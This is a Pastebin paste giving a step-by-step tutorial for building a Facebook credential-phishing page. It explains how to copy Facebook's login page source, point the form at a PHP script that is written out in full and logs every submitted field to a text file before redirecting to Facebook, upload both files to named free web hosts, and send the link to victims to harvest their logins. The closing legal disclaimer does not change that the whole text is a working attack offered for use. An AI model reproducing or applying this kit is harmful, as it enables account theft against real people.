Advertisement
An0nGh05tP5ych0

How to create a phishing site - An0nGh05tP5ych0

Feb 1st, 2015
1,088
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.96 KB | None | 0 0
  1. How to create a phishing site - An0nGh05tP5ych0
  2.  
  3. 1) Goto facebook and right click on the page it should say view page source, click on that.
  4. 2) Now a new tab will open containing open source code, select all the code and paste it into notepad or wordpad.
  5. 3) Now press CTRL+F, and type action.
  6. 4) You will now find a text which says. "action="https://www.facebook.com/login.php?login attempt=1"
  7. 5) Delete all the text written in red colour and instead of it write post.php then it will look like action=post.php
  8. 6) Now save the file and name it index.htm not html.
  9. 7) Now your page is ready it should look like a blank page with a browser logo on it.
  10. 8) Open a new notepad and save the given data with the name post.php
  11. <?php
  12. header ('Location:http://www.facebook.com/');
  13. $handle = fopen("usernames.txt", "a");
  14. foreach($_POST as $variable => $value) {
  15. fwrite($handle, $variable);
  16. fwrite($handle, "=");
  17. fwrite($handle, $value);
  18. fwrite($handle, "\r\n");
  19. }
  20. fwrite($handle, "\r\n");
  21. fclose($handle);
  22. exit;
  23. ?>
  24. 9) You now have two files one is index.htm and another is post.php, remember the extensions are important.
  25. 10) Now you need to upload it to a webhosting site, I use www.000webhost.com or if I can't www.my3gb.com
  26. 11) I prefer to use www.000webhost.com as it's alot easier than everything else.
  27. 12) You have to make an account in that.
  28. 13) Now goto control panel, then goto file manager.
  29. 14) After that a new window will appear goto public_html.
  30. 15) Delete the file named default.php after that upload two files index.htm and post.php one by one.
  31. 16) Now the last step click on view of index.htm it will look the same as the facebook page.
  32. 17) Copy the url of the page and send it to someone.
  33. 18) When they log in they will be re-directed back to the normal facebook page.
  34. 19) Now goto file manager and public_html and there will be a new file named username.txt.
  35. 20) This will contain the login information.
  36.  
  37. NOTE: Phishing is illegal, do this at your own risk.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement